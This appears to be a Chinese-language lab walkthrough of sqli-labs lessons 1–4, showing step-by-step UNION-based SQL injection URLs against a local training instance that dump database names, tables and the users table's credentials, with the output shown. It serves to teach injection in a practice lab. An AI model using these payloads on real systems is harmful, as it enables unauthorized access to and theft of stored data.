sql注入0-4关只存在注入方式的区别
第一关 ?id=1‘--+ ‘
第二关 ?id=1--+ 无
第三关 ?id=1‘)--+ ‘)
第四关 ?id=1")--+ ")
过程同 sqli-labs-master less01,此处只提供less02代码。
判断断sql注入类型:
http://localhost/sqli-labs-master/Less-2?id=1 结果正常
http://localhost/sqli-labs-master/Less-1/?id=1‘ 报错
http://localhost/sqli-labs-master/Less-1/?id=1‘--+ 报错
结果:数字型注入
判断sql查询语句中的字段数:
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4 报错不存在
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3 成功显示
结果:字段数为3
判断回显的字段数:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,3
结果:回显 2 和 3
利用回显字段位置爆库
获取数据库:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(schema_name) from information_schema.schemata --+
结果:information_schema,challenges,dvwa,jokedb,mysql,pikachu,pkxss,security,test
获取security库的表:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+
结果:emails,referers,uagents,users
获取security库的users表:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
结果:id,user,password
获取security库的users的字段信息:http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(concat_ws(0x2d,id,username,password)) from security.users
结果:1-Dumb-Dumb,2-Angelina-I-kill-you,3-Dummy-p@ssword,4-secure-crappy,5-stupid-stupidity,6-superman-genious,7-batman-mob!le,8-admin-admin,9-admin1-admin1,10-admin2-admin2,11-admin3-admin3,12-dhakkan-dumbo,14-admin4-admin4
原文:https://www.cnblogs.com/yyd-sun/p/12256741.html